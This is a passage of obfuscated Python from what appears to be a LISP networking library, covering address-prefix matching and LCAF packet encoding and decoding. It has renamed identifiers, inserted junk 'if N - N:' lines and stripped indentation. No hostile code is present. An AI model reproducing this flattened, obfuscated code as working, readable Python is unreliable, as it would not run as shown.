def print_prefix_no_iid ( self ) :
O0o00o000oO = self . print_address_no_iid ( )
if ( self . is_dist_name ( ) ) : return ( O0o00o000oO )
if ( self . is_geo_prefix ( ) ) : return ( O0o00o000oO )
return ( "{}/{}" . format ( O0o00o000oO , str ( self . mask_len ) ) )
if 16 - 16: Oo0Ooo % OoOoOO00 + I1Ii111 % I1Ii111
if 12 - 12: I1Ii111 . Ii1I / iIii1I11I1II1 + i1IIi
def print_prefix_url ( self ) :
if ( self . is_ultimate_root ( ) ) : return ( "0--0" )
O0o00o000oO = self . print_address ( )
OO000o00 = O0o00o000oO . find ( "]" )
if ( OO000o00 != - 1 ) : O0o00o000oO = O0o00o000oO [ OO000o00 + 1 : : ]
if ( self . is_geo_prefix ( ) ) :
O0o00o000oO = O0o00o000oO . replace ( "/" , "-" )
return ( "{}-{}" . format ( self . instance_id , O0o00o000oO ) )
if 9 - 9: iIii1I11I1II1
return ( "{}-{}-{}" . format ( self . instance_id , O0o00o000oO , self . mask_len ) )
if 75 - 75: I11i . II111iiii * I1IiiI * IiII
if 36 - 36: OOooOOo / I1ii11iIi11i / oO0o / ooOoO0o / I11i
def print_sg ( self , g ) :
o0 = self . print_prefix ( )
III1iIIIi = o0 . find ( "]" ) + 1
g = g . print_prefix ( )
IIi1IiiIiiI = g . find ( "]" ) + 1
iii1IiI1I1 = "[{}]({}, {})" . format ( self . instance_id , o0 [ III1iIIIi : : ] , g [ IIi1IiiIiiI : : ] )
return ( iii1IiI1I1 )
if 47 - 47: II111iiii / o0oOOo0O0Ooo * o0oOOo0O0Ooo + oO0o
if 3 - 3: Oo0Ooo
def hash_address ( self , addr ) :
IiiiI1 = self . address
I1IIIi = addr . address
if 82 - 82: OoooooooOO + OoO0O00 . OoO0O00 * OoO0O00
if ( self . is_geo_prefix ( ) ) : IiiiI1 = self . address . print_geo ( )
if ( addr . is_geo_prefix ( ) ) : I1IIIi = addr . address . print_geo ( )
if 99 - 99: I1ii11iIi11i - OoooooooOO - Ii1I / Oo0Ooo
if ( type ( IiiiI1 ) == str ) :
IiiiI1 = int ( binascii . hexlify ( IiiiI1 [ 0 : 1 ] ) )
if 96 - 96: o0oOOo0O0Ooo . II111iiii
if ( type ( I1IIIi ) == str ) :
I1IIIi = int ( binascii . hexlify ( I1IIIi [ 0 : 1 ] ) )
if 14 - 14: OoooooooOO - i1IIi / i11iIiiIii - OOooOOo - i11iIiiIii . ooOoO0o
return ( IiiiI1 ^ I1IIIi )
if 8 - 8: oO0o * O0 - II111iiii + I1IiiI
if 85 - 85: OoooooooOO % i11iIiiIii / IiII % OoOoOO00 + O0
if 6 - 6: OoooooooOO
if 97 - 97: II111iiii + o0oOOo0O0Ooo * II111iiii
if 17 - 17: o0oOOo0O0Ooo / ooOoO0o + i1IIi
if 78 - 78: iIii1I11I1II1 * o0oOOo0O0Ooo * Oo0Ooo - OoO0O00 / OoO0O00
def is_more_specific ( self , prefix ) :
if ( prefix . afi == LISP_AFI_ULTIMATE_ROOT ) : return ( True )
if 89 - 89: o0oOOo0O0Ooo % o0oOOo0O0Ooo
Ooo0o00 = prefix . mask_len
if ( prefix . afi == LISP_AFI_IID_RANGE ) :
i1IIIii111 = 2 ** ( 32 - Ooo0o00 )
IIIiI1 = prefix . instance_id
I1I1i11i1I1 = IIIiI1 + i1IIIii111
return ( self . instance_id in range ( IIIiI1 , I1I1i11i1I1 ) )
if 3 - 3: iIii1I11I1II1 / I1IiiI % OoO0O00 . I1Ii111
if 46 - 46: I11i % iII111i % iII111i / I11i / I1IiiI
if ( self . instance_id != prefix . instance_id ) : return ( False )
if ( self . afi != prefix . afi ) :
if ( prefix . afi != LISP_AFI_NONE ) : return ( False )
if 74 - 74: oO0o / iIii1I11I1II1 + Oo0Ooo * ooOoO0o % iII111i % i1IIi
if 68 - 68: OoooooooOO
if 81 - 81: OoO0O00 % i1IIi
if 95 - 95: Oo0Ooo - O0 / I1ii11iIi11i . I1IiiI / o0oOOo0O0Ooo % OoOoOO00
if 38 - 38: OoOoOO00 % OoooooooOO . oO0o - OoooooooOO + I11i
if ( self . is_binary ( ) == False ) :
if ( prefix . afi == LISP_AFI_NONE ) : return ( True )
if ( type ( self . address ) != type ( prefix . address ) ) : return ( False )
O0o00o000oO = self . address
Ii11III = prefix . address
if ( self . is_geo_prefix ( ) ) :
O0o00o000oO = self . address . print_geo ( )
Ii11III = prefix . address . print_geo ( )
if 42 - 42: oO0o % OoOoOO00 - oO0o + I11i / i11iIiiIii
if ( len ( O0o00o000oO ) < len ( Ii11III ) ) : return ( False )
return ( O0o00o000oO . find ( Ii11III ) == 0 )
if 74 - 74: OoO0O00 - II111iiii - ooOoO0o % i1IIi
if 42 - 42: i11iIiiIii / O0
if 8 - 8: I1Ii111
if 51 - 51: i11iIiiIii
if 1 - 1: iIii1I11I1II1 . i1IIi . i11iIiiIii % I1ii11iIi11i
if ( self . mask_len < Ooo0o00 ) : return ( False )
if 58 - 58: i11iIiiIii * i11iIiiIii - OoO0O00
oOo00o0o = ( prefix . addr_length ( ) * 8 ) - Ooo0o00
O0OO0O000o = ( 2 ** Ooo0o00 - 1 ) << oOo00o0o
return ( ( self . address & O0OO0O000o ) == prefix . address )
if 8 - 8: i11iIiiIii * OoOoOO00 . o0oOOo0O0Ooo
if 27 - 27: I1ii11iIi11i + Ii1I % I1Ii111
def mask_address ( self , mask_len ) :
oOo00o0o = ( self . addr_length ( ) * 8 ) - mask_len
O0OO0O000o = ( 2 ** mask_len - 1 ) << oOo00o0o
self . address &= O0OO0O000o
if 20 - 20: Oo0Ooo
if 33 - 33: oO0o - OoOoOO00 - i11iIiiIii + I1Ii111 + iIii1I11I1II1
def is_exact_match ( self , prefix ) :
if ( self . instance_id != prefix . instance_id ) : return ( False )
Iii1i1 = self . print_prefix ( )
o0o00o0 = prefix . print_prefix ( ) if prefix else ""
return ( Iii1i1 == o0o00o0 )
if 92 - 92: oO0o * Ii1I / OoO0O00 % II111iiii
if 54 - 54: oO0o + I11i - OoO0O00
def is_local ( self ) :
if ( self . is_ipv4 ( ) ) :
oOoI1 = lisp_myrlocs [ 0 ]
if ( oOoI1 == None ) : return ( False )
oOoI1 = oOoI1 . print_address_no_iid ( )
return ( self . print_address_no_iid ( ) == oOoI1 )
if 22 - 22: OoooooooOO + OoOoOO00 - Ii1I . iII111i / OoooooooOO / I1IiiI
if ( self . is_ipv6 ( ) ) :
oOoI1 = lisp_myrlocs [ 1 ]
if ( oOoI1 == None ) : return ( False )
oOoI1 = oOoI1 . print_address_no_iid ( )
return ( self . print_address_no_iid ( ) == oOoI1 )
if 73 - 73: i1IIi - Ii1I + oO0o * iIii1I11I1II1
return ( False )
if 100 - 100: i11iIiiIii / iIii1I11I1II1 + Oo0Ooo + OoO0O00 - iII111i
if 8 - 8: i11iIiiIii . O0 + o0oOOo0O0Ooo * oO0o + II111iiii
def store_iid_range ( self , iid , mask_len ) :
if ( self . afi == LISP_AFI_NONE ) :
if ( iid is 0 and mask_len is 0 ) : self . afi = LISP_AFI_ULTIMATE_ROOT
else : self . afi = LISP_AFI_IID_RANGE
if 61 - 61: ooOoO0o / ooOoO0o
self . instance_id = iid
self . mask_len = mask_len
if 51 - 51: iIii1I11I1II1 / oO0o * I1Ii111 + i1IIi
if 96 - 96: Oo0Ooo + oO0o - Oo0Ooo - OoOoOO00 % OOooOOo . iIii1I11I1II1
def lcaf_length ( self , lcaf_type ) :
iI1 = self . addr_length ( ) + 2
if ( lcaf_type == LISP_LCAF_AFI_LIST_TYPE ) : iI1 += 4
if ( lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE ) : iI1 += 4
if ( lcaf_type == LISP_LCAF_ASN_TYPE ) : iI1 += 4
if ( lcaf_type == LISP_LCAF_APP_DATA_TYPE ) : iI1 += 8
if ( lcaf_type == LISP_LCAF_GEO_COORD_TYPE ) : iI1 += 12
if ( lcaf_type == LISP_LCAF_OPAQUE_TYPE ) : iI1 += 0
if ( lcaf_type == LISP_LCAF_NAT_TYPE ) : iI1 += 4
if ( lcaf_type == LISP_LCAF_NONCE_LOC_TYPE ) : iI1 += 4
if ( lcaf_type == LISP_LCAF_MCAST_INFO_TYPE ) : iI1 = iI1 * 2 + 8
if ( lcaf_type == LISP_LCAF_ELP_TYPE ) : iI1 += 0
if ( lcaf_type == LISP_LCAF_SECURITY_TYPE ) : iI1 += 6
if ( lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE ) : iI1 += 4
if ( lcaf_type == LISP_LCAF_RLE_TYPE ) : iI1 += 4
return ( iI1 )
if 93 - 93: iIii1I11I1II1 % OoooooooOO
if 6 - 6: II111iiii / oO0o - OOooOOo . O0 - o0oOOo0O0Ooo
if 72 - 72: iIii1I11I1II1 / OoooooooOO * ooOoO0o / ooOoO0o % O0 + IiII
if 96 - 96: iII111i / i11iIiiIii + Oo0Ooo . I1IiiI + iII111i % OoOoOO00
if 19 - 19: i11iIiiIii . Oo0Ooo . OoOoOO00 - I1IiiI
if 85 - 85: I11i - OoO0O00 % iIii1I11I1II1 . iII111i + ooOoO0o . Oo0Ooo
if 87 - 87: iII111i
if 86 - 86: IiII - I11i
if 99 - 99: i1IIi + I1ii11iIi11i
if 24 - 24: ooOoO0o / OoooooooOO % I1ii11iIi11i * ooOoO0o
if 14 - 14: I1ii11iIi11i + OoO0O00 - I1IiiI - Oo0Ooo
if 44 - 44: II111iiii / I1ii11iIi11i
if 39 - 39: OoooooooOO % OoO0O00
if 83 - 83: OOooOOo % I1IiiI + O0 % OoooooooOO
if 84 - 84: I11i - Oo0Ooo % ooOoO0o - II111iiii
if 29 - 29: IiII
if 4 - 4: II111iiii * o0oOOo0O0Ooo - IiII * iII111i
def lcaf_encode_iid ( self ) :
iiii1II = LISP_LCAF_INSTANCE_ID_TYPE
IIiIi1II1IiI = socket . htons ( self . lcaf_length ( iiii1II ) )
oOo00Ooo0o0 = self . instance_id
oO0oO00 = self . afi
O0ooOo = 0
if ( oO0oO00 < 0 ) :
if ( self . afi == LISP_AFI_GEO_COORD ) :
oO0oO00 = LISP_AFI_LCAF
O0ooOo = 0
else :
oO0oO00 = 0
O0ooOo = self . mask_len
if 91 - 91: I1Ii111 * iII111i * OoO0O00
if 79 - 79: iII111i + oO0o
if 19 - 19: I1Ii111 - OOooOOo . ooOoO0o . O0 + II111iiii . OoooooooOO
oooO = struct . pack ( "BBBBH" , 0 , 0 , iiii1II , O0ooOo , IIiIi1II1IiI )
oooO += struct . pack ( "IH" , socket . htonl ( oOo00Ooo0o0 ) , socket . htons ( oO0oO00 ) )
if ( oO0oO00 == 0 ) : return ( oooO )
if 100 - 100: oO0o
if ( self . afi == LISP_AFI_GEO_COORD ) :
oooO = oooO [ 0 : - 2 ]
oooO += self . address . encode_geo ( )
return ( oooO )
if 7 - 7: i11iIiiIii - O0
if 76 - 76: i1IIi . OOooOOo * iIii1I11I1II1 / I1ii11iIi11i % i11iIiiIii / O0
oooO += self . pack_address ( )
return ( oooO )
if 83 - 83: oO0o % OoooooooOO
if 36 - 36: IiII * OoOoOO00 - iIii1I11I1II1 + II111iiii
def lcaf_decode_iid ( self , packet ) :
o00OooooOOOO = "BBBBH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 65 - 65: I1IiiI * I11i . I1Ii111 % I1ii11iIi11i + O0
OoOO0OOOO0 , oOoOoO0Oo0oo , iiii1II , Oo00OOOo00 , iI1 = struct . unpack ( o00OooooOOOO ,
packet [ : oO0o00O ] )
packet = packet [ oO0o00O : : ]
if 11 - 11: OOooOOo % OOooOOo - i11iIiiIii - o0oOOo0O0Ooo
if ( iiii1II != LISP_LCAF_INSTANCE_ID_TYPE ) : return ( None )
if 23 - 23: iII111i * OoO0O00 + o0oOOo0O0Ooo - I1ii11iIi11i % O0 - Oo0Ooo
o00OooooOOOO = "IH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 42 - 42: I11i . I1ii11iIi11i - I11i . OoOoOO00
oOo00Ooo0o0 , oO0oO00 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
packet = packet [ oO0o00O : : ]
if 46 - 46: iII111i
iI1 = socket . ntohs ( iI1 )
self . instance_id = socket . ntohl ( oOo00Ooo0o0 )
oO0oO00 = socket . ntohs ( oO0oO00 )
self . afi = oO0oO00
if ( Oo00OOOo00 != 0 and oO0oO00 == 0 ) : self . mask_len = Oo00OOOo00
if ( oO0oO00 == 0 ) :
self . afi = LISP_AFI_IID_RANGE if Oo00OOOo00 else LISP_AFI_ULTIMATE_ROOT
if 82 - 82: Oo0Ooo % Ii1I * I1Ii111
if 74 - 74: OoO0O00 - oO0o * I1Ii111
if 50 - 50: Ii1I % i11iIiiIii - I1Ii111
if 32 - 32: iIii1I11I1II1 + i1IIi - iII111i + i1IIi / OoOoOO00
if 29 - 29: OOooOOo
if ( oO0oO00 == 0 ) : return ( packet )
if 18 - 18: iII111i - OoO0O00 + oO0o
if 55 - 55: OoO0O00 / Ii1I % ooOoO0o . I1Ii111 * i1IIi . i11iIiiIii
if 34 - 34: I1ii11iIi11i % o0oOOo0O0Ooo % ooOoO0o * Ii1I * I1Ii111
if 59 - 59: Ii1I + Oo0Ooo % O0 % i1IIi - iII111i
if ( self . is_dist_name ( ) ) :
packet , self . address = lisp_decode_dist_name ( packet )
self . mask_len = len ( self . address ) * 8
return ( packet )
if 4 - 4: O0 - oO0o % OoO0O00 % OoooooooOO
if 67 - 67: I11i
if 23 - 23: I1ii11iIi11i - OoOoOO00
if 90 - 90: ooOoO0o - I11i / OoOoOO00
if 12 - 12: II111iiii % I1IiiI - I1ii11iIi11i
if ( oO0oO00 == LISP_AFI_LCAF ) :
o00OooooOOOO = "BBBBH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 24 - 24: Ii1I + I11i
Ooo0o00O0O0oO , OO000OOO , iiii1II , o000OOooo000O , o00O0oOO0o = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 5 - 5: I1Ii111 . Ii1I - ooOoO0o % OoooooooOO
if 2 - 2: OOooOOo . IiII . iII111i / Oo0Ooo
if ( iiii1II != LISP_LCAF_GEO_COORD_TYPE ) : return ( None )
if 86 - 86: OOooOOo . o0oOOo0O0Ooo - iIii1I11I1II1
o00O0oOO0o = socket . ntohs ( o00O0oOO0o )
packet = packet [ oO0o00O : : ]
if ( o00O0oOO0o > len ( packet ) ) : return ( None )
if 12 - 12: oO0o + iII111i
OOoooo = lisp_geo ( "" )
self . afi = LISP_AFI_GEO_COORD
self . address = OOoooo
packet = OOoooo . decode_geo ( packet , o00O0oOO0o , o000OOooo000O )
self . mask_len = self . host_mask_len ( )
return ( packet )
if 16 - 16: O0 + oO0o - ooOoO0o * O0 . I1ii11iIi11i . oO0o
if 4 - 4: I1Ii111
IIiIi1II1IiI = self . addr_length ( )
if ( len ( packet ) < IIiIi1II1IiI ) : return ( None )
if 39 - 39: OoOoOO00 - I1Ii111 / I11i + II111iiii * I1IiiI * I1IiiI
packet = self . unpack_address ( packet )
return ( packet )
if 9 - 9: IiII * I1IiiI * OoO0O00 - I1IiiI * I1IiiI - OoO0O00
if 20 - 20: i1IIi + I1IiiI + i11iIiiIii + II111iiii + i1IIi
if 18 - 18: i11iIiiIii * O0 * Oo0Ooo + iII111i + OOooOOo
if 62 - 62: OOooOOo - oO0o + i1IIi % Ii1I . I1Ii111 . II111iiii
if 94 - 94: OOooOOo - I1IiiI
if 35 - 35: i11iIiiIii
if 27 - 27: O0 % i11iIiiIii - I1Ii111 * oO0o - I11i / Oo0Ooo
if 78 - 78: O0 * i11iIiiIii
if 62 - 62: OoO0O00 * I1Ii111 * Ii1I / ooOoO0o
if 27 - 27: oO0o . iII111i . oO0o
if 37 - 37: Oo0Ooo . I1ii11iIi11i / OoooooooOO % ooOoO0o / I1IiiI + ooOoO0o
if 14 - 14: I11i + ooOoO0o . oO0o * I11i
if 98 - 98: Ii1I . i1IIi * OoO0O00 * Ii1I * iIii1I11I1II1
if 22 - 22: OoooooooOO - OoO0O00 + OoOoOO00 - OOooOOo + i11iIiiIii - oO0o
if 9 - 9: I1Ii111 - i1IIi . ooOoO0o
if 33 - 33: I11i
if 37 - 37: Oo0Ooo
if 36 - 36: IiII % I11i
if 72 - 72: oO0o % I11i % OOooOOo * iIii1I11I1II1 - OOooOOo % O0
if 84 - 84: oO0o - o0oOOo0O0Ooo / II111iiii . o0oOOo0O0Ooo
if 82 - 82: OoooooooOO
def lcaf_encode_sg ( self , group ) :
iiii1II = LISP_LCAF_MCAST_INFO_TYPE
oOo00Ooo0o0 = socket . htonl ( self . instance_id )
IIiIi1II1IiI = socket . htons ( self . lcaf_length ( iiii1II ) )
oooO = struct . pack ( "BBBBHIHBB" , 0 , 0 , iiii1II , 0 , IIiIi1II1IiI , oOo00Ooo0o0 ,
0 , self . mask_len , group . mask_len )
if 14 - 14: OoO0O00 / oO0o - OOooOOo
oooO += struct . pack ( "H" , socket . htons ( self . afi ) )
oooO += self . pack_address ( )
oooO += struct . pack ( "H" , socket . htons ( group . afi ) )
oooO += group . pack_address ( )
return ( oooO )
if 100 - 100: IiII - I11i . iIii1I11I1II1 / iIii1I11I1II1
if 16 - 16: IiII + Oo0Ooo % I11i
def lcaf_decode_sg ( self , packet ) :
o00OooooOOOO = "BBBBHIHBB"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( [ None , None ] )
if 16 - 16: ooOoO0o / I1Ii111
OoOO0OOOO0 , oOoOoO0Oo0oo , iiii1II , O0Ooo000Ooo , iI1 , oOo00Ooo0o0 , OOOoO0Oo , iI1i1i , iiii = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 54 - 54: iIii1I11I1II1 % ooOoO0o
packet = packet [ oO0o00O : : ]
if 37 - 37: OOooOOo % OoOoOO00 - II111iiii * o0oOOo0O0Ooo . I1IiiI . OoOoOO00
if ( iiii1II != LISP_LCAF_MCAST_INFO_TYPE ) : return ( [ None , None ] )
if 92 - 92: I11i + OoO0O00 . OoooooooOO
self . instance_id = socket . ntohl ( oOo00Ooo0o0 )
iI1 = socket . ntohs ( iI1 ) - 8
if 3 - 3: OoO0O00 % iIii1I11I1II1
if 62 - 62: OoooooooOO * o0oOOo0O0Ooo
if 59 - 59: iIii1I11I1II1
if 18 - 18: ooOoO0o % I1IiiI / iIii1I11I1II1 + O0
if 99 - 99: i11iIiiIii - o0oOOo0O0Ooo + o0oOOo0O0Ooo . OoooooooOO * iII111i . Oo0Ooo
o00OooooOOOO = "H"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( [ None , None ] )
if ( iI1 < oO0o00O ) : return ( [ None , None ] )
if 63 - 63: I11i
oO0oO00 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
packet = packet [ oO0o00O : : ]
iI1 -= oO0o00O
self . afi = socket . ntohs ( oO0oO00 )
self . mask_len = iI1i1i
IIiIi1II1IiI = self . addr_length ( )
if ( iI1 < IIiIi1II1IiI ) : return ( [ None , None ] )
if 60 - 60: I1IiiI / I1ii11iIi11i / I11i / Ii1I + iIii1I11I1II1
packet = self . unpack_address ( packet )
if ( packet == None ) : return ( [ None , None ] )
if 85 - 85: O0 / OOooOOo . OoOoOO00 / I1ii11iIi11i
iI1 -= IIiIi1II1IiI
if 80 - 80: I1ii11iIi11i * iII111i % i1IIi * OOooOOo % II111iiii % i1IIi
if 44 - 44: OoooooooOO
if 18 - 18: i11iIiiIii
if 65 - 65: i1IIi . iIii1I11I1II1 % iIii1I11I1II1
if 35 - 35: iIii1I11I1II1 - o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - OOooOOo . o0oOOo0O0Ooo
o00OooooOOOO = "H"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( [ None , None ] )
if ( iI1 < oO0o00O ) : return ( [ None , None ] )
if 12 - 12: iIii1I11I1II1 % OoO0O00 * Oo0Ooo
oO0oO00 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
packet = packet [ oO0o00O : : ]
iI1 -= oO0o00O
oOoooOOO0o0 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
oOoooOOO0o0 . afi = socket . ntohs ( oO0oO00 )
oOoooOOO0o0 . mask_len = iiii
oOoooOOO0o0 . instance_id = self . instance_id
IIiIi1II1IiI = self . addr_length ( )
if ( iI1 < IIiIi1II1IiI ) : return ( [ None , None ] )
if 5 - 5: I11i - II111iiii * iIii1I11I1II1 / iIii1I11I1II1 % IiII * i1IIi
packet = oOoooOOO0o0 . unpack_address ( packet )
if ( packet == None ) : return ( [ None , None ] )
if 30 - 30: i1IIi % I1IiiI . OOooOOo % iIii1I11I1II1 . I1ii11iIi11i / o0oOOo0O0Ooo
return ( [ packet , oOoooOOO0o0 ] )
if 53 - 53: OOooOOo % ooOoO0o
if 94 - 94: OOooOOo - O0 - I1Ii111 / OoooooooOO - iII111i
def lcaf_decode_eid ( self , packet ) :
o00OooooOOOO = "BBB"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( [ None , None ] )
if 83 - 83: OOooOOo * I1ii11iIi11i * iII111i * I1ii11iIi11i . OoO0O00
if 87 - 87: ooOoO0o . O0 - oO0o
if 75 - 75: Oo0Ooo
if 22 - 22: oO0o * I1Ii111 . II111iiii / Ii1I * O0
if 33 - 33: oO0o * i1IIi + ooOoO0o * OOooOOo - O0 - iIii1I11I1II1
O0Ooo000Ooo , OO000OOO , iiii1II = struct . unpack ( o00OooooOOOO ,
packet [ : oO0o00O ] )
if 35 - 35: I1Ii111
if ( iiii1II == LISP_LCAF_INSTANCE_ID_TYPE ) :
return ( [ self . lcaf_decode_iid ( packet ) , None ] )
elif ( iiii1II == LISP_LCAF_MCAST_INFO_TYPE ) :
packet , oOoooOOO0o0 = self . lcaf_decode_sg ( packet )
return ( [ packet , oOoooOOO0o0 ] )
elif ( iiii1II == LISP_LCAF_GEO_COORD_TYPE ) :
o00OooooOOOO = "BBBBH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 12 - 12: Ii1I % I1IiiI - I11i / iIii1I11I1II1 . I1IiiI % I1ii11iIi11i
Ooo0o00O0O0oO , OO000OOO , iiii1II , o000OOooo000O , o00O0oOO0o = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 12 - 12: Oo0Ooo + I1IiiI
if 12 - 12: OoOoOO00 / II111iiii
if ( iiii1II != LISP_LCAF_GEO_COORD_TYPE ) : return ( None )
if 100 - 100: I1ii11iIi11i % iIii1I11I1II1 . IiII . OoooooooOO / II111iiii
o00O0oOO0o = socket . ntohs ( o00O0oOO0o )
packet = packet [ oO0o00O : : ]
if ( o00O0oOO0o > len ( packet ) ) : return ( None )
if 28 - 28: I1IiiI
OOoooo = lisp_geo ( "" )
self . instance_id = 0
self . afi = LISP_AFI_GEO_COORD
self . address = OOoooo
packet = OOoooo . decode_geo ( packet , o00O0oOO0o , o000OOooo000O )
self . mask_len = self . host_mask_len ( )
if 27 - 27: I1IiiI % oO0o - iIii1I11I1II1 - o0oOOo0O0Ooo - IiII - O0
return ( [ packet , None ] )
if 46 - 46: II111iiii
if 24 - 24: i11iIiiIii * i1IIi - I11i + o0oOOo0O0Ooo
if 60 - 60: ooOoO0o
if 62 - 62: i11iIiiIii
if 88 - 88: i11iIiiIii
if 59 - 59: oO0o - OoooooooOO % ooOoO0o
class lisp_elp_node ( ) :
def __init__ ( self ) :
self . address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . probe = False
self . strict = False
self . eid = False
self . we_are_last = False
if 90 - 90: OoOoOO00
if 96 - 96: II111iiii % Ii1I
def copy_elp_node ( self ) :
Oo0ooOOOOOoO = lisp_elp_node ( )
Oo0ooOOOOOoO . copy_address ( self . address )
Oo0ooOOOOOoO . probe = self . probe
Oo0ooOOOOOoO . strict = self . strict
Oo0ooOOOOOoO . eid = self . eid
Oo0ooOOOOOoO . we_are_last = self . we_are_last
return ( Oo0ooOOOOOoO )
if 84 - 84: I1IiiI . I1IiiI
if 82 - 82: OoO0O00 - iIii1I11I1II1 . iIii1I11I1II1 + I1ii11iIi11i
if 45 - 45: iII111i . oO0o * iII111i
class lisp_elp ( ) :
def __init__ ( self , name ) :
self . elp_name = name
self . elp_nodes = [ ]
self . use_elp_node = None
self . we_are_last = False
if 3 - 3: OoOoOO00 / Oo0Ooo - Oo0Ooo
if 54 - 54: Oo0Ooo . OoO0O00 * I1IiiI % IiII
def copy_elp ( self ) :
OOo0oo0OOOO = lisp_elp ( self . elp_name )
OOo0oo0OOOO . use_elp_node = self . use_elp_node
OOo0oo0OOOO . we_are_last = self . we_are_last
for Oo0ooOOOOOoO in self . elp_nodes :
OOo0oo0OOOO . elp_nodes . append ( Oo0ooOOOOOoO . copy_elp_node ( ) )
if 97 - 97: o0oOOo0O0Ooo + Ii1I
return ( OOo0oo0OOOO )
if 77 - 77: I11i - oO0o . Ii1I
if 75 - 75: I11i * OoooooooOO % OoOoOO00 . i1IIi - Ii1I + iIii1I11I1II1
def print_elp ( self , want_marker ) :
iIii1IiI = ""
for Oo0ooOOOOOoO in self . elp_nodes :
ooOOoO0Oo0OoO = ""
if ( want_marker ) :
if ( Oo0ooOOOOOoO == self . use_elp_node ) :
ooOOoO0Oo0OoO = "*"
elif ( Oo0ooOOOOOoO . we_are_last ) :
ooOOoO0Oo0OoO = "x"
if 10 - 10: ooOoO0o
if 86 - 86: OoOoOO00 / Ii1I
iIii1IiI += "{}{}({}{}{}), " . format ( ooOOoO0Oo0OoO ,
Oo0ooOOOOOoO . address . print_address_no_iid ( ) ,
"r" if Oo0ooOOOOOoO . eid else "R" , "P" if Oo0ooOOOOOoO . probe else "p" ,
"S" if Oo0ooOOOOOoO . strict else "s" )
if 80 - 80: II111iiii
return ( iIii1IiI [ 0 : - 2 ] if iIii1IiI != "" else "" )
if 66 - 66: ooOoO0o
if 61 - 61: O0 / II111iiii + I1IiiI + I1ii11iIi11i * Oo0Ooo * I1ii11iIi11i
def select_elp_node ( self ) :
Ii11Ii1IiiIi , oO0Oo0O000 , OO0oo00oOO = lisp_myrlocs
OO000o00 = None
if 80 - 80: OOooOOo % OoO0O00 + OoOoOO00 % iII111i % OoooooooOO - ooOoO0o
for Oo0ooOOOOOoO in self . elp_nodes :
if ( Ii11Ii1IiiIi and Oo0ooOOOOOoO . address . is_exact_match ( Ii11Ii1IiiIi ) ) :
OO000o00 = self . elp_nodes . index ( Oo0ooOOOOOoO )
break
if 25 - 25: OoOoOO00 % i11iIiiIii - I1IiiI * iIii1I11I1II1 - Oo0Ooo . O0
if ( oO0Oo0O000 and Oo0ooOOOOOoO . address . is_exact_match ( oO0Oo0O000 ) ) :
OO000o00 = self . elp_nodes . index ( Oo0ooOOOOOoO )
break
if 48 - 48: I1IiiI + oO0o % i11iIiiIii % iIii1I11I1II1
if 14 - 14: iIii1I11I1II1
if 78 - 78: I1Ii111 / Oo0Ooo - I1Ii111
if 1 - 1: OoO0O00 - I1IiiI * o0oOOo0O0Ooo
if 84 - 84: OoO0O00 % OoooooooOO
if 66 - 66: OoOoOO00 . iII111i
if 1 - 1: iII111i * i1IIi . iIii1I11I1II1 % O0 - OoooooooOO
if ( OO000o00 == None ) :
self . use_elp_node = self . elp_nodes [ 0 ]
Oo0ooOOOOOoO . we_are_last = False
return
if 87 - 87: iII111i . Oo0Ooo * i11iIiiIii % o0oOOo0O0Ooo + Ii1I
if 72 - 72: Ii1I / II111iiii + o0oOOo0O0Ooo
if 33 - 33: I1Ii111 * OoOoOO00 - OoooooooOO
if 11 - 11: I1Ii111 - Oo0Ooo / iIii1I11I1II1 - OoooooooOO
if 71 - 71: Oo0Ooo + Ii1I - OoooooooOO + I11i - iIii1I11I1II1 / O0
if 76 - 76: i11iIiiIii % o0oOOo0O0Ooo . O0 * I11i
if ( self . elp_nodes [ - 1 ] == self . elp_nodes [ OO000o00 ] ) :
self . use_elp_node = None
Oo0ooOOOOOoO . we_are_last = True
return
if 90 - 90: II111iiii + OOooOOo % I1Ii111 * iIii1I11I1II1 % iIii1I11I1II1
if 55 - 55: II111iiii % O0 * O0 - II111iiii * I1IiiI % Oo0Ooo
if 48 - 48: I1ii11iIi11i + OoooooooOO % i1IIi
if 46 - 46: OoOoOO00
if 75 - 75: I1IiiI
self . use_elp_node = self . elp_nodes [ OO000o00 + 1 ]
return
if 37 - 37: iIii1I11I1II1 % OoO0O00 * ooOoO0o + I11i % ooOoO0o / i11iIiiIii
if 14 - 14: i1IIi / ooOoO0o
if 10 - 10: ooOoO0o / OoooooooOO - ooOoO0o % O0 + oO0o - oO0o
class lisp_geo ( ) :
def __init__ ( self , name ) :
self . geo_name = name
self . latitude = 0xffffffff
self . lat_mins = 0
self . lat_secs = 0
self . longitude = 0xffffffff
self . long_mins = 0
self . long_secs = 0
self . altitude = - 1
self . radius = 0
if 16 - 16: O0
if 14 - 14: Ii1I . Ii1I . OOooOOo - O0 / OoO0O00 % II111iiii
def copy_geo ( self ) :
OOoooo = lisp_geo ( self . geo_name )
OOoooo . latitude = self . latitude
OOoooo . lat_mins = self . lat_mins
OOoooo . lat_secs = self . lat_secs
OOoooo . longitude = self . longitude
OOoooo . long_mins = self . long_mins
OOoooo . long_secs = self . long_secs
OOoooo . altitude = self . altitude
OOoooo . radius = self . radius
return ( OOoooo )
